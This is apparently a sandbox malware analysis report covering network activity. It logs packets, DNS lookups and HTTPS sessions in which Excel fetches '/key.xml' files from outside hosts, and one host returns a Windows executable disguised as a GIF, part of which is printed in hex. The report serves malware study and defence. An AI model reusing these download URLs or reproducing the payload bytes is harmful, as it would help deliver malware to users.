                                                                                                                                                                                              Sep 29, 2021 23:45:41.700007915 CEST49738443192.168.2.3162.251.80.22
                                                                                                                                                                                              Sep 29, 2021 23:45:41.700031042 CEST49738443192.168.2.3162.251.80.22
                                                                                                                                                                                              Sep 29, 2021 23:45:41.700037956 CEST44349738162.251.80.22192.168.2.3
                                                                                                                                                                                              Sep 29, 2021 23:45:41.700061083 CEST49738443192.168.2.3162.251.80.22
                                                                                                                                                                                              Sep 29, 2021 23:45:41.700062990 CEST44349738162.251.80.22192.168.2.3
                                                                                                                                                                                              Sep 29, 2021 23:45:41.700103045 CEST49738443192.168.2.3162.251.80.22
                                                                                                                                                                                              Sep 29, 2021 23:45:41.700115919 CEST44349738162.251.80.22192.168.2.3
                                                                                                                                                                                              Sep 29, 2021 23:45:41.700134039 CEST49738443192.168.2.3162.251.80.22
                                                                                                                                                                                              Sep 29, 2021 23:45:41.700139046 CEST44349738162.251.80.22192.168.2.3
                                                                                                                                                                                              Sep 29, 2021 23:45:41.700176001 CEST49738443192.168.2.3162.251.80.22
                                                                                                                                                                                              Sep 29, 2021 23:45:41.700189114 CEST44349738162.251.80.22192.168.2.3
                                                                                                                                                                                              Sep 29, 2021 23:45:41.700208902 CEST44349738162.251.80.22192.168.2.3
                                                                                                                                                                                              Sep 29, 2021 23:45:41.700213909 CEST49738443192.168.2.3162.251.80.22
                                                                                                                                                                                              Sep 29, 2021 23:45:41.700243950 CEST49738443192.168.2.3162.251.80.22
                                                                                                                                                                                              Sep 29, 2021 23:45:41.700258970 CEST44349738162.251.80.22192.168.2.3
                                                                                                                                                                                              Sep 29, 2021 23:45:41.700275898 CEST44349738162.251.80.22192.168.2.3
                                                                                                                                                                                              Sep 29, 2021 23:45:41.700292110 CEST49738443192.168.2.3162.251.80.22
                                                                                                                                                                                              Sep 29, 2021 23:45:41.700333118 CEST44349738162.251.80.22192.168.2.3
                                                                                                                                                                                              Sep 29, 2021 23:45:41.700340986 CEST49738443192.168.2.3162.251.80.22
                                                                                                                                                                                              Sep 29, 2021 23:45:41.700357914 CEST44349738162.251.80.22192.168.2.3
                                                                                                                                                                                              Sep 29, 2021 23:45:41.700406075 CEST44349738162.251.80.22192.168.2.3
                                                                                                                                                                                              Sep 29, 2021 23:45:41.700426102 CEST49738443192.168.2.3162.251.80.22
                                                                                                                                                                                              Sep 29, 2021 23:45:41.700433969 CEST49738443192.168.2.3162.251.80.22
                                                                                                                                                                                              Sep 29, 2021 23:45:41.700440884 CEST44349738162.251.80.22192.168.2.3
                                                                                                                                                                                              Sep 29, 2021 23:45:41.700454950 CEST44349738162.251.80.22192.168.2.3
                                                                                                                                                                                              Sep 29, 2021 23:45:41.700480938 CEST49738443192.168.2.3162.251.80.22
                                                                                                                                                                                              Sep 29, 2021 23:45:41.700495005 CEST49738443192.168.2.3162.251.80.22
                                                                                                                                                                                              Sep 29, 2021 23:45:41.700521946 CEST44349738162.251.80.22192.168.2.3
                                                                                                                                                                                              Sep 29, 2021 23:45:41.700570107 CEST49738443192.168.2.3162.251.80.22
                                                                                                                                                                                              Sep 29, 2021 23:45:41.710911036 CEST49738443192.168.2.3162.251.80.22
                                                                                                                                                                                              Sep 29, 2021 23:45:41.710944891 CEST44349738162.251.80.22192.168.2.3
                                                                                                                                                                                              Sep 29, 2021 23:45:41.968044996 CEST49752443192.168.2.3162.222.225.250
                                                                                                                                                                                              Sep 29, 2021 23:45:41.968101978 CEST44349752162.222.225.250192.168.2.3
                                                                                                                                                                                              Sep 29, 2021 23:45:41.968269110 CEST49752443192.168.2.3162.222.225.250
                                                                                                                                                                                              Sep 29, 2021 23:45:41.969397068 CEST49752443192.168.2.3162.222.225.250
                                                                                                                                                                                              Sep 29, 2021 23:45:41.969425917 CEST44349752162.222.225.250192.168.2.3
                                                                                                                                                                                              Sep 29, 2021 23:45:42.469434023 CEST44349752162.222.225.250192.168.2.3
                                                                                                                                                                                              Sep 29, 2021 23:45:42.469532967 CEST49752443192.168.2.3162.222.225.250
                                                                                                                                                                                              Sep 29, 2021 23:45:42.476418018 CEST49752443192.168.2.3162.222.225.250
                                                                                                                                                                                              Sep 29, 2021 23:45:42.476432085 CEST44349752162.222.225.250192.168.2.3
                                                                                                                                                                                              Sep 29, 2021 23:45:42.476680994 CEST44349752162.222.225.250192.168.2.3
                                                                                                                                                                                              Sep 29, 2021 23:45:42.476751089 CEST49752443192.168.2.3162.222.225.250
                                                                                                                                                                                              Sep 29, 2021 23:45:42.477380991 CEST49752443192.168.2.3162.222.225.250
                                                                                                                                                                                              Sep 29, 2021 23:45:42.519136906 CEST44349752162.222.225.250192.168.2.3
                                                                                                                                                                                              Sep 29, 2021 23:45:44.476270914 CEST44349752162.222.225.250192.168.2.3
                                                                                                                                                                                              Sep 29, 2021 23:45:44.476423979 CEST44349752162.222.225.250192.168.2.3
                                                                                                                                                                                              Sep 29, 2021 23:45:44.476442099 CEST49752443192.168.2.3162.222.225.250
                                                                                                                                                                                              Sep 29, 2021 23:45:44.476490021 CEST49752443192.168.2.3162.222.225.250
                                                                                                                                                                                              Sep 29, 2021 23:45:44.478199005 CEST49752443192.168.2.3162.222.225.250
                                                                                                                                                                                              Sep 29, 2021 23:45:44.478239059 CEST44349752162.222.225.250192.168.2.3
                                                                                                                                                                                              Sep 29, 2021 23:45:44.478277922 CEST49752443192.168.2.3162.222.225.250
                                                                                                                                                                                              Sep 29, 2021 23:45:44.478307009 CEST49752443192.168.2.3162.222.225.250

                                                                                                                                                                                              UDP Packets

                                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                              Sep 29, 2021 23:45:28.494210005 CEST5220653192.168.2.38.8.8.8
                                                                                                                                                                                              Sep 29, 2021 23:45:28.574611902 CEST5684453192.168.2.38.8.8.8
                                                                                                                                                                                              Sep 29, 2021 23:45:28.598423004 CEST5804553192.168.2.38.8.8.8
                                                                                                                                                                                              Sep 29, 2021 23:45:28.613317966 CEST53522068.8.8.8192.168.2.3
                                                                                                                                                                                              Sep 29, 2021 23:45:28.690145969 CEST53568448.8.8.8192.168.2.3
                                                                                                                                                                                              Sep 29, 2021 23:45:28.722018957 CEST53580458.8.8.8192.168.2.3
                                                                                                                                                                                              Sep 29, 2021 23:45:29.237890959 CEST5745953192.168.2.38.8.8.8
                                                                                                                                                                                              Sep 29, 2021 23:45:29.352591038 CEST53574598.8.8.8192.168.2.3
                                                                                                                                                                                              Sep 29, 2021 23:45:32.304583073 CEST5787553192.168.2.38.8.8.8
                                                                                                                                                                                              Sep 29, 2021 23:45:33.320091963 CEST5787553192.168.2.38.8.8.8
                                                                                                                                                                                              Sep 29, 2021 23:45:33.438595057 CEST53578758.8.8.8192.168.2.3
                                                                                                                                                                                              Sep 29, 2021 23:45:36.026088953 CEST5415453192.168.2.38.8.8.8
                                                                                                                                                                                              Sep 29, 2021 23:45:36.150233030 CEST53541548.8.8.8192.168.2.3
                                                                                                                                                                                              Sep 29, 2021 23:45:37.291699886 CEST5280653192.168.2.38.8.8.8
                                                                                                                                                                                              Sep 29, 2021 23:45:37.407661915 CEST53528068.8.8.8192.168.2.3
                                                                                                                                                                                              Sep 29, 2021 23:45:37.705020905 CEST5391053192.168.2.38.8.8.8
                                                                                                                                                                                              Sep 29, 2021 23:45:37.819569111 CEST53539108.8.8.8192.168.2.3
                                                                                                                                                                                              Sep 29, 2021 23:45:38.288856030 CEST5280653192.168.2.38.8.8.8
                                                                                                                                                                                              Sep 29, 2021 23:45:38.400434017 CEST53528068.8.8.8192.168.2.3
                                                                                                                                                                                              Sep 29, 2021 23:45:39.335782051 CEST5280653192.168.2.38.8.8.8
                                                                                                                                                                                              Sep 29, 2021 23:45:39.362862110 CEST6402153192.168.2.38.8.8.8
                                                                                                                                                                                              Sep 29, 2021 23:45:39.452197075 CEST53528068.8.8.8192.168.2.3
                                                                                                                                                                                              Sep 29, 2021 23:45:39.481199980 CEST53640218.8.8.8192.168.2.3
                                                                                                                                                                                              Sep 29, 2021 23:45:39.599226952 CEST6078453192.168.2.38.8.8.8
                                                                                                                                                                                              Sep 29, 2021 23:45:39.721508980 CEST53607848.8.8.8192.168.2.3
                                                                                                                                                                                              Sep 29, 2021 23:45:41.336085081 CEST5280653192.168.2.38.8.8.8
                                                                                                                                                                                              Sep 29, 2021 23:45:41.451344013 CEST53528068.8.8.8192.168.2.3
                                                                                                                                                                                              Sep 29, 2021 23:45:41.725260019 CEST5114353192.168.2.38.8.8.8
                                                                                                                                                                                              Sep 29, 2021 23:45:41.963067055 CEST53511438.8.8.8192.168.2.3
                                                                                                                                                                                              Sep 29, 2021 23:45:45.383542061 CEST5280653192.168.2.38.8.8.8
                                                                                                                                                                                              Sep 29, 2021 23:45:45.506244898 CEST53528068.8.8.8192.168.2.3
                                                                                                                                                                                              Sep 29, 2021 23:45:52.568393946 CEST5600953192.168.2.38.8.8.8
                                                                                                                                                                                              Sep 29, 2021 23:45:52.705120087 CEST53560098.8.8.8192.168.2.3
                                                                                                                                                                                              Sep 29, 2021 23:45:58.358753920 CEST5902653192.168.2.38.8.8.8
                                                                                                                                                                                              Sep 29, 2021 23:45:58.492579937 CEST53590268.8.8.8192.168.2.3
                                                                                                                                                                                              Sep 29, 2021 23:46:13.663846016 CEST4957253192.168.2.38.8.8.8
                                                                                                                                                                                              Sep 29, 2021 23:46:13.805028915 CEST53495728.8.8.8192.168.2.3
                                                                                                                                                                                              Sep 29, 2021 23:46:16.438081026 CEST6082353192.168.2.38.8.8.8
                                                                                                                                                                                              Sep 29, 2021 23:46:16.578440905 CEST53608238.8.8.8192.168.2.3
                                                                                                                                                                                              Sep 29, 2021 23:46:17.694287062 CEST5213053192.168.2.38.8.8.8
                                                                                                                                                                                              Sep 29, 2021 23:46:17.901379108 CEST53521308.8.8.8192.168.2.3
                                                                                                                                                                                              Sep 29, 2021 23:46:18.965082884 CEST5510253192.168.2.38.8.8.8
                                                                                                                                                                                              Sep 29, 2021 23:46:19.123353958 CEST53551028.8.8.8192.168.2.3
                                                                                                                                                                                              Sep 29, 2021 23:46:19.564786911 CEST5623653192.168.2.38.8.8.8
                                                                                                                                                                                              Sep 29, 2021 23:46:19.706991911 CEST53562368.8.8.8192.168.2.3
                                                                                                                                                                                              Sep 29, 2021 23:46:20.022239923 CEST5652753192.168.2.38.8.8.8
                                                                                                                                                                                              Sep 29, 2021 23:46:20.170953035 CEST53565278.8.8.8192.168.2.3
                                                                                                                                                                                              Sep 29, 2021 23:46:21.240654945 CEST4955953192.168.2.38.8.8.8
                                                                                                                                                                                              Sep 29, 2021 23:46:21.376467943 CEST53495598.8.8.8192.168.2.3
                                                                                                                                                                                              Sep 29, 2021 23:46:22.527937889 CEST5265053192.168.2.38.8.8.8
                                                                                                                                                                                              Sep 29, 2021 23:46:22.675168037 CEST53526508.8.8.8192.168.2.3
                                                                                                                                                                                              Sep 29, 2021 23:46:23.907902956 CEST6329753192.168.2.38.8.8.8
                                                                                                                                                                                              Sep 29, 2021 23:46:24.047070980 CEST53632978.8.8.8192.168.2.3
                                                                                                                                                                                              Sep 29, 2021 23:46:24.588015079 CEST5836153192.168.2.38.8.8.8
                                                                                                                                                                                              Sep 29, 2021 23:46:24.728986025 CEST53583618.8.8.8192.168.2.3
                                                                                                                                                                                              Sep 29, 2021 23:46:26.234682083 CEST5361553192.168.2.38.8.8.8
                                                                                                                                                                                              Sep 29, 2021 23:46:26.396428108 CEST53536158.8.8.8192.168.2.3
                                                                                                                                                                                              Sep 29, 2021 23:46:27.055633068 CEST5072853192.168.2.38.8.8.8
                                                                                                                                                                                              Sep 29, 2021 23:46:27.195471048 CEST53507288.8.8.8192.168.2.3
                                                                                                                                                                                              Sep 29, 2021 23:46:27.205462933 CEST5377753192.168.2.38.8.8.8
                                                                                                                                                                                              Sep 29, 2021 23:46:27.350475073 CEST53537778.8.8.8192.168.2.3
                                                                                                                                                                                              Sep 29, 2021 23:46:27.884777069 CEST5710653192.168.2.38.8.8.8
                                                                                                                                                                                              Sep 29, 2021 23:46:28.025418997 CEST53571068.8.8.8192.168.2.3
                                                                                                                                                                                              Sep 29, 2021 23:46:28.487222910 CEST6035253192.168.2.38.8.8.8
                                                                                                                                                                                              Sep 29, 2021 23:46:28.650146008 CEST53603528.8.8.8192.168.2.3
                                                                                                                                                                                              Sep 29, 2021 23:46:29.049592018 CEST5677353192.168.2.38.8.8.8
                                                                                                                                                                                              Sep 29, 2021 23:46:29.195369005 CEST53567738.8.8.8192.168.2.3
                                                                                                                                                                                              Sep 29, 2021 23:46:30.986731052 CEST6098253192.168.2.38.8.8.8
                                                                                                                                                                                              Sep 29, 2021 23:46:31.123006105 CEST53609828.8.8.8192.168.2.3
                                                                                                                                                                                              Sep 29, 2021 23:46:31.432497025 CEST5805853192.168.2.38.8.8.8
                                                                                                                                                                                              Sep 29, 2021 23:46:31.572757959 CEST53580588.8.8.8192.168.2.3
                                                                                                                                                                                              Sep 29, 2021 23:46:41.286484957 CEST6436753192.168.2.38.8.8.8
                                                                                                                                                                                              Sep 29, 2021 23:46:41.426651001 CEST53643678.8.8.8192.168.2.3
                                                                                                                                                                                              Sep 29, 2021 23:46:43.920655966 CEST5153953192.168.2.38.8.8.8
                                                                                                                                                                                              Sep 29, 2021 23:46:44.067890882 CEST53515398.8.8.8192.168.2.3
                                                                                                                                                                                              Sep 29, 2021 23:46:59.655370951 CEST5539353192.168.2.38.8.8.8
                                                                                                                                                                                              Sep 29, 2021 23:46:59.780313015 CEST53553938.8.8.8192.168.2.3
                                                                                                                                                                                              Sep 29, 2021 23:47:22.966129065 CEST5058553192.168.2.38.8.8.8
                                                                                                                                                                                              Sep 29, 2021 23:47:23.096263885 CEST53505858.8.8.8192.168.2.3
                                                                                                                                                                                              Sep 29, 2021 23:47:23.652939081 CEST6345653192.168.2.38.8.8.8
                                                                                                                                                                                              Sep 29, 2021 23:47:23.771456957 CEST53634568.8.8.8192.168.2.3
                                                                                                                                                                                              Sep 29, 2021 23:47:54.395596981 CEST5854053192.168.2.38.8.8.8
                                                                                                                                                                                              Sep 29, 2021 23:47:54.523077965 CEST53585408.8.8.8192.168.2.3

                                                                                                                                                                                              DNS Queries

                                                                                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                                                              Sep 29, 2021 23:45:37.705020905 CEST192.168.2.38.8.8.80x2059Standard query (0)gillcart.comA (IP address)IN (0x0001)
                                                                                                                                                                                              Sep 29, 2021 23:45:39.362862110 CEST192.168.2.38.8.8.80x16aStandard query (0)geit.inA (IP address)IN (0x0001)
                                                                                                                                                                                              Sep 29, 2021 23:45:41.725260019 CEST192.168.2.38.8.8.80xca2cStandard query (0)mercanets.comA (IP address)IN (0x0001)

                                                                                                                                                                                              DNS Answers

                                                                                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                                                              Sep 29, 2021 23:45:37.819569111 CEST8.8.8.8192.168.2.30x2059No error (0)gillcart.com199.79.63.251A (IP address)IN (0x0001)
                                                                                                                                                                                              Sep 29, 2021 23:45:39.481199980 CEST8.8.8.8192.168.2.30x16aNo error (0)geit.in162.251.80.22A (IP address)IN (0x0001)
                                                                                                                                                                                              Sep 29, 2021 23:45:41.963067055 CEST8.8.8.8192.168.2.30xca2cNo error (0)mercanets.com162.222.225.250A (IP address)IN (0x0001)

                                                                                                                                                                                              HTTP Request Dependency Graph

                                                                                                                                                                                              • gillcart.com
                                                                                                                                                                                              • geit.in
                                                                                                                                                                                              • mercanets.com

                                                                                                                                                                                              HTTPS Proxied Packets

                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                              0192.168.2.349724199.79.63.251443C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                              2021-09-29 21:45:38 UTC0OUTGET /Cdpmoyhr/key.xml HTTP/1.1
                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                              Host: gillcart.com
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              2021-09-29 21:45:39 UTC0INHTTP/1.1 404 Not Found
                                                                                                                                                                                              Date: Wed, 29 Sep 2021 21:45:38 GMT
                                                                                                                                                                                              Server: Apache
                                                                                                                                                                                              Upgrade: h2,h2c
                                                                                                                                                                                              Connection: Upgrade, close
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                              Content-Type: text/html;charset=utf-8
                                                                                                                                                                                              2021-09-29 21:45:39 UTC0INData Raw: 33 65 38 32 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 69 65 3d 65 64 67 65 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e
                                                                                                                                                                                              Data Ascii: 3e82<!DOCTYPE html><html lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge" /><meta http-equiv="X-UA-Compatible" content="ie=edge"><meta name="viewport" con
                                                                                                                                                                                              2021-09-29 21:45:39 UTC8INData Raw: 6c 20 63 6c 61 73 73 3d 22 63 61 74 65 67 6f 72 69 65 73 5f 6d 65 67 61 5f 6d 65 6e 75 20
                                                                                                                                                                                              Data Ascii: l class="categories_mega_menu


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                              1192.168.2.349738162.251.80.22443C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                              2021-09-29 21:45:39 UTC8OUTGET /MeOlE9Xxd/key.xml HTTP/1.1
                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                              Host: geit.in
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              2021-09-29 21:45:40 UTC8INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Wed, 29 Sep 2021 21:45:40 GMT
                                                                                                                                                                                              Server: nginx/1.19.5
                                                                                                                                                                                              Content-Type: image/gif
                                                                                                                                                                                              Content-Length: 468910
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              X-Server-Cache: true
                                                                                                                                                                                              X-Proxy-Cache: HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              2021-09-29 21:45:40 UTC8INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 52 ce 36 9b 16 af 58 c8 16 af 58 c8 16 af 58 c8 81 6b 27 c8 17 af 58 c8 31 69 35 c8 01 af 58 c8 31 69 26 c8 04 af 58 c8 31 69 24 c8 10 af 58 c8 31 69 36 c8 1c af 58 c8 d5 a0 07 c8 15 af 58 c8 d5 a0 06 c8 13 af 58 c8 16 af 59 c8 57 ae 58 c8 31 69 2f c8 6e af 58 c8 31 69 23 c8 17 af 58 c8 31 69 25 c8 17 af 58 c8 31 69 21 c8 17 af 58 c8 52 69 63 68 16 af 58 c8 00 00 00 00 00 00 00
                                                                                                                                                                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$R6XXXk'X1i5X1i&X1i$X1i6XXXYWX1i/nX1i#X1i%X1i!XRichX
                                                                                                                                                                                              2021-09-29 21:45:40 UTC16INData Raw: ff ff 8b f2 2b f1 83 ee 5b 66 89 35 5c 9e 06 10 0f b7 f6 89 0d e4 9e 06 10 8b ce 2b 0d e4 9e 06 10 8d 54 0a a0 b9 05 00 00 00 39 0d 20 9f 06 10 89 15 e0 9e 06 10 74 10 2b d6 81 c2 f5 f2 00 00 89 15 28 9f 06 10 eb 0c 8b fe 2b fa 03 f8 89 3d e0 9e 06 10 39 0d d0 9e 06 10 75 09 83 3d d4 9e 06 10 00 74 18 a1 e4 9e 06 10 8a d0 2a 15 5c 9e 06 10 80 ea 0b 88 15 58 9e 06 10 eb 10 0f b6 c3 2b 05 e4 9e 06 10 03 c6 a3 e4 9e 06 10 8b 0d 60 8a 07 10 51 50 e8 55 dd 03 00 0f b6 1d 58 9e 06 10 0f b7 15 5c 9e 06 10 8d 4c 1a 08 83 c4 08 a3 28 9f 06 10 89 0d 54 9e 06 10 56 05 ed 9b 8b 0d e0 9e 06 10 2b 0d 5c 9e 06 10 8b 35 e4 9e 06 10 8b 3d e8 9e 06 10 03 ce 81 ff 64 21 00 00 66 89 0d 5c 9e 06 10 75 18 03 05 20 9f 06 10 8b d0 0f af d0 69 d2 8a 07 01 00 8b c2 a3 28 9f 06 10
                                                                                                                                                                                              Data Ascii: +[f5\+T9 t+(+=9u=t*\X+`QPUX\L(TV+\5=d!f\u i(
                                                                                                                                                                                              2021-09-29 21:45:40 UTC24INData Raw: 00 00 6a 1e e8 dd 11 00 00 68 ff 00 00 00 e8 35 0f 00 00 59 59 8b 75 08 8d 34 f5 88 91 06 10 39 1e 74 04 8b c7 eb 6e 6a 18 e8 22 25 00 00 59 8b f8 3b fb 75 0f e8 c0 13 00 00 c7 00 0c 00 00 00 33 c0 eb 51 6a 0a e8 59 00 00 00 59 89 5d fc 39 1e 75 2c 68 a0 0f 00 00 57 e8 fd 4f 00 00 59 59 85 c0 75 17 57 e8 28 f4 ff ff 59 e8 8a 13 00 00 c7 00 0c 00 00 00 89 5d e4 eb 0b 89 3e eb 07 57 e8 0d f4 ff ff 59 c7 45 fc fe ff ff ff e8 09 00 00 00 8b 45 e4 e8 82 0b 00 00 c3 6a 0a e8 2a ff ff ff 59 c3 55 8b ec 8b 45 08 56 8d 34 c5 88 91 06 10 83 3e 00 75 13 50 e8 24 ff ff ff 85 c0 59 75 08 6a 11 e8 35 0e 00 00 59 ff 36 ff 15 50 10 04 10 5e 5d c3 68 40 01 00 00 6a 00 ff 35 e4 a4 06 10 ff 15 00 10 04 10 85 c0 a3 20 a2 07 10 75 01 c3 8b 4c 24 04 83 25 e0 a4 06 10 00 83 25
                                                                                                                                                                                              Data Ascii: jh5YYu49tnj"%Y;u3QjYY]9u,hWOYYuW(Y]>WYEEj*YUEV4>uP$Yuj5Y6P^]h@j5 uL$%%
                                                                                                                                                                                              2021-09-29 21:45:40 UTC32INData Raw: e8 2f fb ff ff 59 ff d0 83 f8 ff a3 f0 9a 06 10 74 48 68 14 02 00 00 6a 01 e8 72 05 00 00 8b f0 85 f6 59 59 74 34 56 ff 35 f0 9a 06 10 ff 35 90 a8 06 10 e8 fc fa ff ff 59 ff d0 85 c0 74 1b 6a 00 56 e8 c0 fb ff ff 59 59 ff 15 58 10 04 10 83 4e 04 ff 89 06 33 c0 40 eb 07 e8 6b fb ff ff 33 c0 5e 5f c3 8b 44 24 04 85 c0 74 12 83 e8 08 81 38 dd dd 00 00 75 07 50 e8 15 d4 ff ff 59 c3 55 8b ec 83 ec 14 a1 80 91 06 10 33 c5 89 45 fc 53 56 33 db 39 1d 98 a8 06 10 57 8b f1 75 38 53 53 33 ff 47 57 68 28 19 04 10 68 00 01 00 00 53 ff 15 d8 10 04 10 85 c0 74 08 89 3d 98 a8 06 10 eb 15 ff 15 68 10 04 10 83 f8 78 75 0a c7 05 98 a8 06 10 02 00 00 00 39 5d 14 7e 22 8b 4d 14 8b 45 10 49 38 18 74 08 40 3b cb 75 f6 83 c9 ff 8b 45 14 2b c1 48 3b 45 14 7d 01 40 89 45 14 a1 98
                                                                                                                                                                                              Data Ascii: /YtHhjrYYt4V55YtjVYYXN3@k3^_D$t8uPYU3ESV39Wu8SS3GWh(hSt=hxu9]~"MEI8t@;uE+H;E}@E
                                                                                                                                                                                              2021-09-29 21:45:40 UTC40INData Raw: 98 1d 00 00 59 85 c0 74 0f f6 07 04 6a 00 58 0f 95 c0 40 89 45 e4 eb 05 e8 ad 06 00 00 c7 45 fc fe ff ff ff 8b 45 e4 eb 0e 33 c0 40 c3 8b 65 e8 e9 49 06 00 00 33 c0 e8 e0 cb ff ff c3 6a 08 68 b8 7c 06 10 e8 8e cb ff ff 8b 45 10 f7 00 00 00 00 80 74 05 8b 5d 0c eb 0a 8b 48 08 8b 55 0c 8d 5c 11 0c 83 65 fc 00 8b 75 14 56 50 ff 75 0c 8b 7d 08 57 e8 46 fe ff ff 83 c4 10 48 74 1f 48 75 34 6a 01 8d 46 08 50 ff 77 18 e8 ac fb ff ff 59 59 50 ff 76 18 53 e8 b5 b4 ff ff eb 18 8d 46 08 50 ff 77 18 e8 92 fb ff ff 59 59 50 ff 76 18 53 e8 9b b4 ff ff c7 45 fc fe ff ff ff e8 5b cb ff ff c3 33 c0 40 c3 8b 65 e8 e9 b0 05 00 00 55 8b ec 83 7d 18 00 74 10 ff 75 18 53 56 ff 75 08 e8 59 ff ff ff 83 c4 10 83 7d 20 00 ff 75 08 75 03 56 eb 03 ff 75 20 e8 5c b4 ff ff ff 37 ff 75
                                                                                                                                                                                              Data Ascii: YtjX@EEE3@eI3jh|Et]HU\euVPu}WFHtHu4jFPwYYPvSFPwYYPvSE[3@eU}tuSVuY} uuVu \7u
                                                                                                                                                                                              2021-09-29 21:45:40 UTC48INData Raw: c2 10 00 6a 0c 68 f0 7d 06 10 e8 c8 ab ff ff 83 65 fc 00 66 0f 28 c1 c7 45 e4 01 00 00 00 eb 23 8b 45 ec 8b 00 8b 00 3d 05 00 00 c0 74 0a 3d 1d 00 00 c0 74 03 33 c0 c3 33 c0 40 c3 8b 65 e8 83 65 e4 00 c7 45 fc fe ff ff ff 8b 45 e4 e8 ca ab ff ff c3 55 8b ec 83 ec 18 33 c0 53 89 45 fc 89 45 f4 89 45 f8 53 9c 58 8b c8 35 00 00 20 00 50 9d 9c 5a 2b d1 74 1f 51 9d 33 c0 0f a2 89 45 f4 89 5d e8 89 55 ec 89 4d f0 b8 01 00 00 00 0f a2 89 55 fc 89 45 f8 5b f7 45 fc 00 00 00 04 74 0e e8 5e ff ff ff 85 c0 74 05 33 c0 40 eb 02 33 c0 5b c9 c3 e8 9b ff ff ff a3 e4 a0 07 10 33 c0 c3 55 8b ec 83 ec 14 56 57 ff 75 08 8d 4d ec e8 b7 8b ff ff 8b 45 10 8b 75 0c 33 ff 3b c7 74 02 89 30 3b f7 75 2c e8 10 b3 ff ff 57 57 57 57 57 c7 00 16 00 00 00 e8 70 d5 ff ff 83 c4 14 80 7d
                                                                                                                                                                                              Data Ascii: jh}ef(E#E=t=t33@eeEEU3SEEESX5 PZ+tQ3E]UMUE[Et^t3@3[3UVWuMEu3;t0;u,WWWWWp}
